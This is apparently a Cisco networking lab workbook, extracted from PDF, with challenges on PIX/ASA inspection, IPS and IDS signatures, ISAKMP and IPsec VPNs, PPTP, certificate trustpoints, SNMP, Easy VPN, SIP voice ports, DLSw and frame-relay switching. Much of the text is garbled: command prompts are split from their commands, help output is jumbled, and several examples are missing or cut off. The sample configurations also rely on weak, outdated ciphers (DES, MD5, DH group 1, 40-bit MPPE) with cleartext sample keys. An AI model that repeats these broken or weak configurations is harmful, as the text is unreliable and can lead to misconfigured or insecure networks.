dele Delete a file at server site
get
help Help information from server
mkd
Create a directory
put
rmd
Remove a directory
rnfr Rename from
rnto Rename to
site Specify server specific command
stou Store a file with a unique name
pixfirewall(config)# mgcp-map mmap
call-agent
Add a Call-Agent
gateway
Add a Gateway
help
no
pixfirewall(config-mgcp-map)# call ?
A.B.C.D IP address
pixfirewall(config-mgcp-map)# gat ?
A.B.C.D IP address
PIX/ASA Test
End of unit test
Take the on-line test, go to:
http://networksims.com/e_ns.html
Key facts
Not available in this version.
Network Security 1
End of unit test
NetworkSims.com
975
Take the on-line test, go to:

http://networksims.com/e_ns2.htm
Key facts
Not available in this version.
NetworkSims.com
976
20 Cisco
Academy
Security 2
Network

Outline
This challenge involves the downloading an IPS signature file, and using it.
Objectives
Download IPS signature file.

Apply it.
Define logging.
Example
> en
# config t
# copy tftp://10.0.0.1/new.sdf flash:new.sdf
(config)# config t
(config)# ip ips ?
deny-action Specify Deny action
fail
Specify what to do during any failures
name
Specify an IPS rule
notify
Specify the notification mechanisms (SDEE, nr-director or log)
for the alarms
sdf
Specify the location of the signature definition file
signature
Add a policy to a signature
(config)# ip ips na ?
WORD Name of IPS rule
(config)# ip ips na TEST ?
list Specify an access list to match
<cr>
(config)# ip ips name TEST
(config)# ip ips sd ?
builtin
Use the built in signature definition file
location Location of the signature definition file
(config)# ip ips sdf location ?
NetworkSims.com
977
WORD
URL of the signature definition file
(config)# ip ips sdf location flash:attack-drop.sdf

(config)# int e0
(config-if)# ip ips ?
WORD Name of defined IPS rule
(config-if)# ip ips TEST ?
in
Inbound IPS
out Outbound IPS
(config-if)# ip ips TEST in
(config-if)# exit
(config)# logging ?
Hostname or A.B.C.D
buffered
cns-events
console
count
exception
facility
history
host
monitor
on
origin-id
rate-limit
reload
server-arp
source-interface

Set console logging parameters
Count every log message and timestamp last occurrence
Set syslog server IP address and parameters
Set terminal line (monitor) logging parameters
Enable logging to all enabled destinations
Add origin ID to syslog messages
Set reload logging level
Enable sending ARP requests for syslog servers when
first configured
transactions
trap
<0-7>
alerts
(severity=1)
critical
Critical conditions
(severity=2)
debugging
Debugging messages
(severity=7)
emergencies
System is unusable
(severity=0)
errors
Error conditions
(severity=3)
informational
(severity=6)
notifications
warnings
Warning conditions
(severity=4)
xml
Enable logging in XML to XML logging buffer
<cr>
In this case the logging of traps will be sent to the Syslog server.

NetworkSims.com
978
Outline
This challenge involves the configuration of IDS signatures.
Objectives
Define IP audit rules.

Remove IDS signatures.
Example
myPIX # config t
myPIX (config)# help ip
USAGE:
DESCRIPTION:
ip

SYNTAX:
<poolname>
<ip1>-[<ip2>]
<netmask>
<if_name>
info
attack
alarm
drop
reset
<audit_name>
<sig_number>

to syslog servers.
packet.
active connection.
Audit policy name.
see also:

myPIX (config)# ip audit info action alarm
NetworkSims.com
979
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
ip
ip
ip
ip
ip
ip
audit
audit
audit
audit
audit
audit
attack action alarm

signature 1001 disable

| string <text>
myPIX (config)# logging console informational

Outline
Objectives

Define encryption.
Example
NetworkSims.com
980
> en
# config t
(config)# crypto
(config)# crypto
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config)# crypto
(config)# crypto
(config)# crypto
isakmp enable
isakmp policy 111
encryption des
hash sha
group 1
exit

Outline
Objectives

Define IKE.
Show the tunnel details.
Example
> en
# config t
136.163.130.0 0.0.255.255
(config-isakmp)# ?
ISAKMP commands:
default
encryption
exit
NetworkSims.com
981
group
hash
lifetime
no
(config-isakmp)# en ?
aes
des
rsa-encr
rsa-sig
(config-isakmp)# g ?
default
description
dialer
exit
match
Match values.
no
qos
set
address Match address of packets to encrypt.
<100-199>
WORD
Access-list name
identity
isakmp-profile
peer
pfs
transform-set
(config-crypto-map)# s t ?
WORD Proposal tag
NetworkSims.com
982

(config)# int e0
(config-if)# exit
(config)# exit
# show crypto ipsec sa
interface: E0
Crypto map tag: Manchester, local addr 192.168.1.1
protected vrf: (none)
local ident (addr/mask/prot/port): (50.93.0.0/255.255.0.0/0/0)
remote ident (addr/mask/prot/port): (136.163.0.0/255.255.0.0/0/0)
current_peer 192.168.1.1 port 500
PERMIT, flags={origin_is_acl,}
#pkts encaps: 43, #pkts encrypt: 43, #pkts digest: 43
#pkts decaps: 43, #pkts decrypt: 43, #pkts verify: 43
#pkts compressed: 0, #pkts decompressed: 0
#pkts not compressed: 0, #pkts compr. failed: 0
#pkts not decompressed: 0, #pkts decompress failed: 0
#send errors 4, #recv errors 0
local crypto endpt.: 192.168.1.1, remote crypto endpt.: 144.55.62.1
path mtu 1500, ip mtu 1500, ip mtu idb E0
current outbound spi: 0x267BC43(40352835)
inbound esp sas:
spi: 0xD9F4BC76(3656694902)
transform: esp-des
IV size: 8 bytes
Status: ACTIVE
inbound ah sas:
inbound pcp sas:
outbound esp sas:
spi: 0x267BC43(40352835)
transform: esp-des
IV size: 8 bytes
Status: ACTIVE
outbound ah sas:
outbound pcp sas:
NetworkSims.com
983
# show crypto isakmp sa

dst
src
144.55.62.1
192.168.1.1
state
QM_IDLE
conn-id slot
1
0
status
ACTIVE

Outline
Objectives

Example
> en
# config t
61.222.47.2
61.222.47.2
61.222.47.2 eq isakmp
london
london
london
london
(config)# int e0

Outline
This challenge involves the configuration of ISAKMP.
NetworkSims.com
984
Objectives
Define ISAKMP.
Define ISAKMP policy.
Enable ISAKMP on an interface.
Example
pixfirewall(config)# isakmp
Usage: isakmp policy <priority> authen <pre-share|rsa-sig>
isakmp policy <priority> encrypt <aes|aes-192|aes-256|des|3des>
isakmp policy <priority> hash <md5|sha>
isakmp policy <priority> group <1|2|5>
isakmp key <key-string> address <ip> [netmask <mask>] [no-xauth] [noconfig-mode]
isakmp identity <address|hostname|key-id> [<key-id-string>]
isakmp keepalive <seconds> [<retry seconds>]
isakmp client configuration address-pool local <poolname> [<pif_name>]
isakmp peer fqdn|ip <fqdn|ip> [no-xauth] [no-config-mode]
pixfirewall(config)# help isakmp
USAGE:
isakmp am-disable
isakmp ipsec-over-tcp [port <port1>..<port10>]
isakmp disconnect-notify
(DEPRECATED) isakmp key <keystring> address <peer-address> [netmask <mask>]
[no-xauth] [no-config-mode]
isakmp identity {auto|address|hostname|key_id <key_id_str>}
(DEPRECATED) isakmp keepalive <threshold> [<retry-interval>]
(DEPRECATED) isakmp client configuration address-pool local <pool-name>
[<if_name>]
(DEPRECATED) isakmp peer fqdn | ip <fqdn | ip> {no-xauth | no-mode-cfg}
isakmp policy <priority> authen {<pre-share|rsa-sig|dsa-sig>}
isakmp policy <priority> encrypt {<des|3des|aes|aes-192|aes-256>}
isakmp policy <priority> group {<1|2|5|7>}
isakmp policy <priority> hash {<md5|sha>}
isakmp reload-wait
DESCRIPTION:
isakmp
Configure ISAKMP key, peer, policy and other options
SYNTAX:
am-disable
ipsec-over-tcp
port
NetworkSims.com
Disable inbound aggressive mode connections

Enable and configure IPSec over TCP
Set IPSec over TCP ports
985
<port1..port10>
disconnect-notify
key
Specify up to 10 IPSec over TCP ports

Enable disconnect notification to peers
Configure a pre-shared key associated with a peer
This command is deprecated. Refer to
'tunnel-group ipsec-attributes' instead
<keystring>
String (ASCII) to be used for authentication pre-share
<peer-address>
IP address of peer associated with pre-shared key
<mask>
Netmask specified in dotted-decimal notation
no-xauth
Specifies an xauth policy exception
no-mode-config
Specifies a config mode policy exception
enable
Enable ISAKMP on specified interface
<if_name>
Interface name on which to enable ISAKMP
identity
Set identity type (address,hostname or key-id)
<address>
Use IP address of the interface for the identity
<auto>
Identity auto(IP address for preshared key and
Cert DN for Cert based connections)
<hostname>
Use hostname of the device for the identity
<key-id>
Use specified key-id string for the identity
<key-id-str>
The string to be used as key-id
keepalive
Set keepalive interval. This command is deprecated.
Refer to 'tunnel-group ipsec-attributes' instead
<threshold>
Time, in seconds, peer can remain idle before
keep-alive monitoring commences
<retry-interval>
Time, in seconds, between keep-alive messages
nat-traversal
Enable and configure nat traversal
<natkeepalive>
Set nat traversal keepalive interval
<priority>
Policy suite priority (1 highest, 65535 lowest)
authentication
Authentication method (pre-share,rsa-sig or dsa-sig)
encryption
Encryption algorithm (des,3des,aes,aes-192 or aes256)
hash
Hash algorithm (md5 or sha)
group
Diffie-Hellman group (1,2,5 or 7)
lifetime
ISAKMP SA lifetime (seconds)
client configuration address-pool local
Configure client IP address pool attribute
This command is deprecated. Refer to 'ip local-pool',
'tunnel-group general-attributes address-pool' instead
<pool-name>
Name of ip local pool to allocate dynamic client ip
<if_name>
Interface name the ip local pool is associated with
Defaults to 'outside' if not specified
peer
Identify a peer security gateway to exempt from Xauth
and/or Mode Configuration. This command is deprecated.
Refer to 'isakmp identity' instead
<fqdn | ip>
Fully qualified domain name or IP address of a remote
peer to be exempted from xauth or config mode policy
reload-wait
Wait for voluntary termination of sessions before reboot
see also:
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
isakmp
isakmp
isakmp
isakmp
isakmp
isakmp
isakmp
isakmp
ca, dynamic-map, ipsec, map

enable outside
key ABC&FDD address 176.16.0.2 netmask 255.255.255.255
identity address
policy 5 authen pre-share
policy 5 encrypt des
policy 5 hash sha
policy 5 group 1
policy 5 lifetime 86400
(config)# show isakmp

NetworkSims.com
986
Outline
This challenge involves the configuration of crypto details.
Objectives
Enable IPSEC.
Apply a crypto map.
Example
(config)# help sysopt
USAGE:
[no] sysopt connection { permit-ipsec |
timewait | {tcpmss [minimum] <bytes>}
[no] sysopt noproxyarp <if-name>
[no] sysopt nodnsalias { inbound | outbound }
[no] sysopt radius ignore-secret
[no] sysopt uauth allow-http-cache
show running-config [all] sysopt
clear configure sysopt
DESCRIPTION:
sysopt
Set system functional option
SYNTAX:
connection permit-ipsec
- Exempt IPSec traffic from access check.
connection timewait
- TCP conn undergoes TIMEWAIT state.
connection tcpmss
- Set maximum limit of TCP MSS to <bytes>.
connection tcpmss minimum - Set minimum limit of TCP MSS to <bytes>.
noproxyarp <if-name>
- Disable proxy arp on interface <if-name>.
nodnsalias inbound
- Disable alias inbound DNS A record translation.
nodnsalias outbound
- Disable alias outbound DNS A record translation.
radius ignore-secret
- Ignore secret in RADIUS accounting responses.
uauth allow-http-cache
- Allow browser to use cached user credentials.
see also: alias, ca, ipsec, isakmp, map, dynamic-map
(config)# sysopt connection permit-ipsec
(config)# help cry
USAGE:
crypto { ca | dynamic-map | ipsec | isakmp | key | map }
For more detailed help, please refer directly to the subcommands
DESCRIPTION:
crypto
Configure IPsec, IKE, Certificate Authority and Long Term
NetworkSims.com
987
Key Operations
SYNTAX:
ca
Configure the Certification Authority

See "crypto ca ?" or "help ca"
dynamic-map
IPSec crypto dynamic-map policy

See "crypto dynamic-map ?" or "dynamic-map ?" or
"help dynamic-map"
ipsec
Configure transform-set and IPSec SA lifetime

See "crypto ipsec ?" or "ipsec ?" or "help ipsec"
isakmp
IKE policy and configuration

See "crypto isakmp ?" or "isakmp ?" or "help isakmp"
key

See "crypto key ?" or "help key"
map
IPSec crypto map policy

See "crypto map ?" or "map ?" or "help map"
(config)# crypto ipsec transform-set MYIPSECFORMAT esp-des esp-sha-hmac

(config)# crypto map MYIPSEC 10 ipsec-isakmp
255.255.255.0
(config)# crypto map MYIPSEC 10 match address 111
(config)# crypto map MYIPSEC 10 set peer 176.16.0.2
(config)# crypto map MYIPSEC 10 set transform-set MYIPSECFORMAT
(config)# crypto map MYIPSEC interface outside

Outline
This challenge involves the configuration of VPDN.
Objectives
Enable PPTP.
Define local pool.
Create VPDN group.
Enable VPDN on an interface.
Example
(config)# sysopt connection permit-pptp
(config)# help ip
USAGE:
NetworkSims.com
988

DESCRIPTION:
ip

SYNTAX:
<poolname>
<ip1>-[<ip2>]
<netmask>
<if_name>
info
attack
alarm
drop
reset
<audit_name>
<sig_number>

to syslog servers.
packet.
active connection.
Audit policy name.
see also:

(config)# ip local pool pptp-pool 10.0.0.1-10.0.0.100
(config)# help vpd
USAGE:
vpdn group <name>
accept dialin l2tp
ppp authentication pap|chap|mschap|eap
This command has been deprecated. New syntax:
tunnel-group <name> ppp-attributes
authentication pap
authentication chap
authentication mschap
authentication eap |
client configuration address local <address_pool_name> |
client configuration dns <dns_ip1> [<dns_ip2>]|
client configuration wins <wins_ip1> [<wins_ip2>]|
client authentication local|aaa <auth_aaa_group>|
client accounting <acct_aaa_group>|
l2tp tunnel hello <hello_time>
show vpdn tunnel [l2tp|pppoe] [id <tnl_id>|packets|state|summary|transport]
show vpdn session [l2tp|pppoe] [id <sess_id>|packets|state|window]
show vpdn pppinterface [id <dev_id>]
show vpdn group [<group_name>]
show vpdn username [user_name]
NetworkSims.com
989
clear vpdn [group|interface|tunnel|username]

DESCRIPTION:
vpdn
Configure VPDN (L2TP, PPPoE) Policy
SYNTAX:
<address_pool_name>
<dns_ip>
<wins_ip>
<auth_aaa_group>
<acct_aaa_group>
<hello_time>
<if_name>
<name>
<passwd>
<tnl_id>
<sess_id>
<store-local>
see also:
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
local address pool name

DNS server ip address
WINS server ip address
Authentication AAA server group name
Accounting AAA server group name
l2tp tunnel keep-alive hello timeout value (seconds)
Interface to accept L2TP request
user name
user password
tunnel id
session id
Store in local flash instead of using external config
crypto, aaa-server, ip local pool

vpdn
vpdn
vpdn
vpdn
vpdn
vpdn
vpdn
group 1 accept dialin pptp

group 1 ppp authentication mschap
group 1 ppp encryption mppe 40
group 1 client configuration address local pptp-pool
group 1 client configuration dns 172.64.10.1
group 1 client authentication local
enable outside

Outline
This challenge involves the configuration of a digital certificate server.
Objectives
Enable domain name.

Generate RSA keys.
Define trustpoints.
Example
# config t
test(config)# ip host FRED 1.2.3.4
test(config)# ip domain-name test.com
test(config)# crypto ?
ca
Certification authority
dynamic-map Specify a dynamic crypto map template
NetworkSims.com
990
identity
Enter a crypto identity list
ipsec
Configure IPSEC policy
isakmp
Configure ISAKMP policy
key
keyring
Key ring commands
map
Enter a crypto map
mib
Configure Crypto-related MIB Parameters
pki
Public Key components
wui
Crypto HTTP configuration interfaces
xauth
X-Auth parameters
test(config)# crypto ca ?
authenticate Get the CA certificate
certificate
Actions on certificates
crl
Actions on certificate revocation lists
enroll
export
Export certificate or PKCS12 file
import
Import certificate or PKCS12 file
profile
Define a certificate profile
trustpoint
test(config)# cry ca t ?
WORD CA Server Name
test(config)# cry ca t ANY ?
<cr>
test (config)# crypto ca trustpoint testing
test(ca-trustpoint)# ?
CA Trust Point configuration commands:
authorization
Authorization parameters.
auto-enroll
Automatically enroll this router identity
crl
CRL options
default
enrollment
Enrollment parameters
exit
Exit from certificate authority trustpoint entry mode
fqdn
include fully-qualified domain name
ip-address
include ip address
match
Match a certificate map
no
ocsp
OCSP parameters
password
revocation password
primary
Specify trustpoint as primary
query
Query parameters
regenerate
Regenerate keys on re-enrollment
revocation-check Revocation checking options
root
Protocol to get CA certificate
rsakeypair
Specify rsakeypair for this identity
serial-number
include serial number
show
Show this router trustpoint
source
Specify source
subject-name
Subject Name
usage
Certificate Usage
vrf
vrf to use for enrollment and obtaining CRLs
test(ca-trustpoint)# enrollment ?
http-proxy HTTP proxy server for enrollment
mode
Mode supported by the Certificate Authority
profile
Specify an profile for enrollment
retry
Polling parameters
terminal
Enroll via the terminal (cut-and-paste)
url
CA server enrollment URL
test(ca-trustpoint)# enrollment url ?
WORD
HTTP URL
flash:
Enroll via flash: file system
ftp:
Enroll via ftp: file system
http:
Enroll via http: file system
NetworkSims.com
991
https:
Enroll via https: file system
null:
Enroll via null: file system
nvram:
Enroll via nvram: file system
pem
Include PEM encapsulation boundaries
rcp:
Enroll via rcp: file system
scp:
Enroll via scp: file system
system: Enroll via system: file system
tftp:
Enroll via tftp: file system
<cr>
test(ca-trustpoint)# enrollment url http:/testing/1.dll
test(ca-trustpoint)# crl ?
optional Optional crl
query
Query crl
test(ca-trustpoint)# crl optional
test(ca-trustpoint)# exit
test(config)# crypto ca
WORD CA Server Name
WORD CA Server Name
<cr>
authenticate ?
authenticate fred
enroll ?
enroll fred

Outline
This challenge involves the configuration of SNMP settings
Objectives
Example
# config t
chassis-id
community
contact
context
Create/Delete a context apart from default
drop
Silently drop SNMP packets
enable
engineID
group
NetworkSims.com
992
host
ifindex
location
packetsize
queue-length
system-shutdown
trap
SNMP trap options
trap-source
trap-timeout
user
view
(config)# snmp-server community popup ro
traps
Enable SNMP Traps
(config)# snmp-server com popup ?
<1-99>
string
WORD
Access-list name
ro
Read-only access with this community string
rw
Read-write access with this community string
view
Restrict this community to a named MIB view
<cr>
(config)# snmp-server community popup ro ?
<1-99>
string
WORD
Access-list name
<cr>
(config)# snmp-server community popup ro 10
Which limits access to SNMP to only the 10.0.0.0 network.

Outline
This challenge involves setting up the Easy VPN server on the IOS Firewall. In this
challenge the details for the Cisco VPN Client will be defined.
Objectives
NetworkSims.com
993
Define AAA details.

Define Cisco VPN group details.
Define VPN details.
Example
# config t
(config)# aaa authentication login DEFAULT1 ?
enable
group
Use Server-group
krb5
Use Kerberos 5 authentication.
krb5-telnet Allow logins only if already authenticated via Kerberos V
Telnet.
line
local
local-case
none
NO authentication.
(config)# aaa authentication login DEFAULT1 local
(config)# aaa authorization network DEFAULT2 ?
group
Use server-group.
if-authenticated Succeed if user has authenticated.
local
Use local database.
none
No authorization (always succeeds).
(config)# aaa authorization network DEFAULT2 local
(config)# ip local pool POOL1 10.0.0.1 10.0.0.254
(config)# crypto
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
isakmp policy 5
encryption des
hash md5
group 2
exit
The following details will be used by users for their VPN connection:
(config)# crypto isakmp client configuration group MYCONNECTION
(config-isakmp-group)# ?
ISAKMP group policy config commands:
access-restrict
Restrict clients in this group to an interface
acl
Specify split tunneling inclusion access-list number
backup-gateway
Specify backup gateway
dns
Specify DNS Addresses
domain
Set default domain name to send to client
firewall
Enforce group firewall feature
group-lock
Enforce group lock feature
include-local-lan Enable Local LAN Access with no split tunnel
key
pre-shared key/IKE password
max-logins
Set maximum simultaneous logins for users in this group
max-users
Set maximum number of users for this group
netmask
netmask used by the client for local connectivity
no
pfs
The client should propose PFS
pool
Set name of address pool
save-password
Allows remote client to save XAUTH password
split-dns
DNS name to append for resolution
NetworkSims.com
994
wins
Specify WINS Addresses
<cr>
(config-isakmp-group)# domain ?
WORD default domain name
(config-isakmp-group)# domain test.com
(config-isakmp-group)# key ?
0
6
Specifies an ENCRYPTED password will follow
WORD The UNENCRYPTED (cleartext) user password
(config-isakmp-group)# key testing
(config-isakmp-group)# pool ?
WORD address pool name
(config-isakmp-group)# pool POOL1
(config-isakmp-group)# exit
On the VPN client the following details would be defined:

Group name: MYCONNECTION
Group password:
testing
The user, if successful, will then be allocated an address from the IP pool (POOL1).
Now we must define the IPSec transform to be used:
(config)# crypto ipsec transform-set MYSET esp-des
(cfg-crypto-trans)# ?
Crypto transform configuration commands:
exit
Exit from crypto transform configuration mode
mode
encapsulation mode (transport/tunnel)
no
(cfg-crypto-trans)# exit
NetworkSims.com
995
To define the authorization and authentication for local users:

(config)# crypto map MYMAP client authentication list DEFAULT1
(config)# crypto map MYMAP isakmp authorization list DEFAULT2
(config)# crypto map MYMAP 10
(config-config-map)# set transform-set MYSET
(config-config-map)# exit
(config)# int e0
(config-if)# crypto map MYMAP
NetworkSims.com
996
21 Router Additional
Outline
This challenge involves the configuration of SIP with a Cisco SIP Gateway FXO setup. Some
routers have Foreign Exchange Station (FXS) interfaces which can connect to a standard
telephone, fax machine, or similar device and thus must provide ringing, voltage supplies,
and a dial tone. Normally the FXS interface uses an RJ-11 connector to connect to telephone
equipment.
Objectives
Define SIP details.

Define the voice port settings
Outline
> enable
# sh version
# config t
(config)# sip-au
(config-sip-ua)# ?
(config-sip-ua)# exit
(config)# voice-port ?
(config)# voice-port 1/0/0
(config-voiceport)# ?
(config-voiceport)# description ?
(config-voiceport)# description testing
(config-voiceport)# input ?
(config-voiceport)# input gain ?
(config-voiceport)# input gain 8
(config-voiceport)# caller-id ?
(config-voiceport)# caller-id enable
(config-voiceport)# exit
(config)# dial-peer ?
(config)# dial-peer voice ?
(config)# dial-peer voice 200 ?
(config)# dial-peer voice 200 voip
(config-dial-peer)# ?
(config-dial-peer)# exit
(config)# gateway
(config-gateway)# ?
NetworkSims.com
997
Example
> enable
# sh version
Cisco IOS Software, C2600 Software (C2600-ADVENTERPRISEK9-M),
SOFTWARE (fc1)
Compiled Fri 17-Nov-06 11:18 by prod_rel_team
Version
12.4(12),
ROM: System Bootstrap, Version 12.2(7r) [cmong 7r], RELEASE SOFTWARE (fc1)
Router uptime is 5 hours, 38 minutes
System image file is "flash:c2600-testk9-mz.124-12.bin"
Cisco 2611XM (MPC860P) processor (revision 1.0) with 111616K/19456K bytes of memory.
Processor board ID JAD07130QPE
M860 processor: part number 5, mask 2
2 FastEthernet interfaces
2 Serial(sync/async) interfaces
2 Voice FXO interfaces
2 Voice FXS interfaces
32K bytes of NVRAM.
49152K bytes of processor board System flash (Read/Write)
# config t
(config)# sip-au
(config-sip-ua)# ?
SIP UA configuration commands:
aaa
sip-ua AAA related configuration
authentication
Digest Authentication Configuration
calling-info
Specify treatment of calling information
default
disable-early-media Disable early-media cut through
exit
Exit from sip-ua configuration mode
max-forwards
Change number of max-forwards for SIP Methods
mwi-server
Configure a mwi Server
nat
Enable NAT(Network Address Traversal) settings for the
SIP User Agent
no
notify
SIP Signaling Notify Configuration
offer
Configure settings for Offers made from the Gateway
reason-header
Configure settings for supporting SIP Reason Header
redirection
Enable call redirection (3xx) handling
registrar
Configure SIP registrar VoIP Interface
remote-party-id
Enable Remote-Party-ID support in SIP User Agent
retry
Change default retries for each SIP Method
set
Sets the PSTN cause to SIP status code (and vice versa)
and sets the PSTN cause to SIP requests
sip-server
Configure a SIP Server Interface
srv
DNS SRV Query Type
suspend-resume
Enable support for ISDN SUSPEND/RESUME
timers
SIP Signaling Timers Configuration
transport
Enable SIP UA transport for TCP/UDP
<1-1> Voice interface slot
NetworkSims.com
998
RELEASE
Voice-port configuration commands:
battery-reversal
Enable FXS battery-reversal generation
bearer-cap
Specify the bear capability
busyout
Configure busyout trigger event & procedure
caller-id
comfort-noise
Use fill-silence option
connection
Specify Trunking Parameters
cptone
Configure voice call progress tone locale
default
description
Description of what this port is connected to
disc_pi_off
close voice path when disconnect with PI received
disconnect-ack
FXS sending disconnect acknowledge
echo-cancel
Echo-cancellation option
exit
Exit from voice-port configuration mode
impedance
Specifies the terminating impedance of the interface
input
Configure input gain for voice
music-threshold
Threshold for Music on Hold
mwi
Enable MWI on this port
no
non-linear
Use non-linear processing during echo cancellation
output
Configure output attenuation for voice
playout-delay
ren
Ringer Equivalence Number
ring
Ring frequency Parameters
shutdown
Take voice-port offline
signal
The signaling type for the interface FXS or FXO
snmp
Modify SNMP voice port parameters
station-id
Configure station ID
supervisory
Configure supervisory disconnect lcfo
threshold
Threshold [noise] for voice port
timeouts
Configure voice timeout parameters
timing
Configure voice timing parameters
translate
Translation rule
translation-profile Translation profile
trunk-group
voice-class
Set voiceport voice class control parameters
LINE A string (up to 64 characters) describing the port connection (e.g.
pbx1)
gain Configure gain in db for voice input
<-6 - 14> gain in db
alerting
Define caller id alerting method
attenuation Configure caller id tx attenuation
block
Block the caller id of the calls made from this port
enable
Enable caller id on this port
format
Change caller id format
cor
hunt
outbound
voice
Voice type
NetworkSims.com
999

pots
Telephony
vofr
voip
Voice over IP
acc-qos
answer-address
application
call
call-block
carrier-id
clid
Caller ID option
codec
corlist
default
description
destination-pattern
dnis-map
dtmf-relay
exit
expect-factor
fax
Configure fax
fax-relay
fax-relay options
huntstop
icpif
incoming
ip
max-conn
to unlimited
max-redirects
dialpeer
modem
no
numbering-type
permission
playout-delay
preference
req-qos
roaming
Use roaming server
rtp
RTP config
session
peer
settle-call
shutdown
signal-type
peer
signaling
snmp
tech-prefix
tone
Generate tones
NetworkSims.com
1000
translate-outgoing
translation-profile
trunk-group-label
trunkgroup
vad
voice
voice-class
(config)# gateway
Translation rule
Translation profile
(config-gateway)# ?
GATEWAY configuration commands:
default
emulate
Gateway emulation configuration
exit
Exit from gateway configuration mode
no
security Gateway security configuration
timer
Gateway-wide timers

Outline
This challenge involves the configuration of DLSw (Data-Link Switching), which allows the
tunneling of Systems Network Architecture (SNA) and NetBIOS traffic within an IP
network. It uses a switch-to-switch protocol, and the routers are named data link switches.
Objectives
Define a local loopback address.

Define DLSw details.
Outline
> enable
# config t
(config-if)# exit
(config)# dlsw remote 0 tcp 11.0.0.1
(config)# dlsw bridge 1
(config)# dlsw udp-disable
(config)# int fa0
(config-if)# exit
Example
In the following case the local address is 10.0.0.1, and the remote address is 11.0.0.1.
NetworkSims.com
1001
> enable
# config t
(config-if)# exit
(config)# dlsw ?
allroute-netbios
allroute-sna
bgroup-list
bridge-group
cache-ignore-netbios-datagram
circuit-keepalives
disable
explorerQ-depth
fast-hpr-support
group-cache
history-log
icannotreach
icanreach
llc2
load-balance
local-peer
mac-addr
max-multiple-rifs
multicast
netbios-cache-length
netbios-keepalive-filter
netbios-name
peer-log-changes
peer-on-demand-defaults
port-list
prom-peer-defaults
redundant-rings
remote-peer
ring-list
rsvp
timer
tos
touch-timer
transparent
udp-disable
(config)# dl local- ?
biu-segment
border
cluster
cost
group
init-pacing-window
keepalive
lf
max-pacing-window
passive
NetworkSims.com
255.255.255.0
Use All routes Broadcast for NETBIOS Explorers
Use All routes Broadcast for SNA Explorers
Configure a transparent bridge group list
DLSw interconnection to transparent bridging
Don't cache source mac/name of NetBIOS
datagrams
Configure DLSw+ to generate periodic circuit
keepalives
Disable DLSw without altering the
configuration
Configure depth of DLSw control queues
Enable fast-switched HPR transport
Border Peer Caching Options
Configure DLSw Circuit-History Log Capability
Configure a resource not locally reachable by
this router
Configure resources locally reachable by this
router
Dlsw llc2 options
Configure load balancing
Configure local peer
Configure a static MAC address - location or
path
Configure maximum multiple rifs per interface
Configure DLSw Multicast Capability
Configure NetBIOS name length
Filter NetBIOS session alive packets
Configure a static NetBios name - location or
path
print logging message in router log ONLY for
error events
Change peer-on-demand defaults
Configure a port list
Change prom-peer-defaults
Configure redundant ring-list
Configure a remote peer
Configure a ring list
Configure reservations using RSVP
Configure DLSw timers
Change IP Type Of Service precedence bits
Configure DLSw touch timers
Configure transparent media options
Disable DLSw UDP unicast feature
XID3 max receivable i-field spoofing and BIU segmenting

Capable of operating as a border peer
Set cluster id for this router
Set peer cost advertised to remote peers
Set the peer group number for this router
Initial Pacing Window Size for this local peer
Set the default remote peer keepalive interval
Local peer largest frame size
Maximum Pacing Window Size for this local peer
This router will not initiate remote peer connections
1002
peer-id
promiscuous
v2-single-tcp
vrf
<cr>
local-peer IP address; required for TCP/FST and peer

groups
Accept connections from non-configured remote peers
use dlsw v2 single tcp peer bringup for all remote peers
from this router
VRF in which dlsw local peer resides
(config)# dlsw local-peer ?

biu-segment
border
cluster
cost
group
init-pacing-window Initial Pacing Window Size for this local peer
keepalive
lf
max-pacing-window
passive
peer-id
groups
promiscuous
v2-single-tcp
from this router
vrf
<cr>
(config)# dlsw local- peer ?
A.B.C.D Local Peer IP address
(config)# dlsw localbiu-segment
border
cluster
cost
group
init-pacing-window
keepalive
lf
max-pacing-window
passive
peer-id
promiscuous
v2-single-tcp
vrf
<cr>
peer 10.0.0.1 ?
groups
from this router
Router(config)# dlsw remote ?

<0-4095> Remote peer ring group list
Router(config)# dlsw remote 0 ?
frame-relay Use Frame Relay for remote peer transport
fst
Use fast sequence transport (FST) for remote peer transport
interface
Use a direct interface for remote peer transport
tcp
Use TCP for remote peer transport
Router(config)# dlsw remote 0 tcp ?
A.B.C.D Remote peer IP address
Router(config)# dlsw remote 0 tcp 11.0.0.0 ?
backup-peer
Configure as a backup to an existing remote peer
NetworkSims.com
1003
bytes-netbios-out
circuit-weight
cluster
cost
dest-mac
dmac-output-list
dynamic
host-netbios-out
keepalive
lf
lsap-output-list
passive
priority
rif-passthru
rsvp
tcp-queue-max
timeout
v2-single-tcp
<cr>
Configure netbios bytes output filtering for this peer

Configure circuit-weight for this peer
Override cluster-id of remote peer
Cost to Reach this Remote Peer
Exclusive destination mac-addr for remote peer
Filter output destination mac addresses
Enable dynamic connection for this remote peer
Configure netbios host output filtering for this peer
Set keepalive interval for this remote peer
Largest Frame Size for this Remote Peer
Filter output IEEE 802.5 encapsulated packets
Local peer will not initiate this remote peer connection
Enable prioritization features for this remote peer
Use rif_passthru for this remote peer
Maximum output TCP queue size for this remote peer
Set retransmission timeout value for this remote peer
use dlsw v2 single tcp peer bringup for this remote peer
(config)# dlsw remote 0 tcp 11.0.0.1

(config)# dlsw bridge ?
<1-255> Assign a Bridge Group to be assigned to DLSw
(config)# dlsw bridge 1 ?
llc2
locaddr-priority Assign an input SNA LU Addr priority list to this bridge
group
sap-priority
Assign an input sap priority list to this bridge group
<cr>
(config)# dlsw bridge 1
(config)# int fa0
(config-if)# bridge-group ?
(config-if)# bridge-g 1 ?
circuit-group
input-address-list
group list
group list
input-lsap-list
input-pattern-list
input-type-list
lat-compression
interfaces
output-address-list
group list
a group list
output-lsap-list
output-pattern-list
output-type-list
path-cost
priority
spanning-disabled
(config-if)# exit
NetworkSims.com
1004

Outline
This challenge involves the configuration of a frame-relay switch.
Objectives
Define frame-relay switching.

Define frame-relay parameters for S0 and S1.
Outline
> enable
# config t
(config)# frame-relay switching
(config)# int s0
(config-if)# clock-rate 56000
(config-if)# frame-relay intf-type dce
(config-if)# frame-relay route 100 interface s1 101
(config-if)# exit
(config)# int s1
In this case the S0 interface advertises a DCLI of 100, and S1 advertises a DCLI of 101.
Example
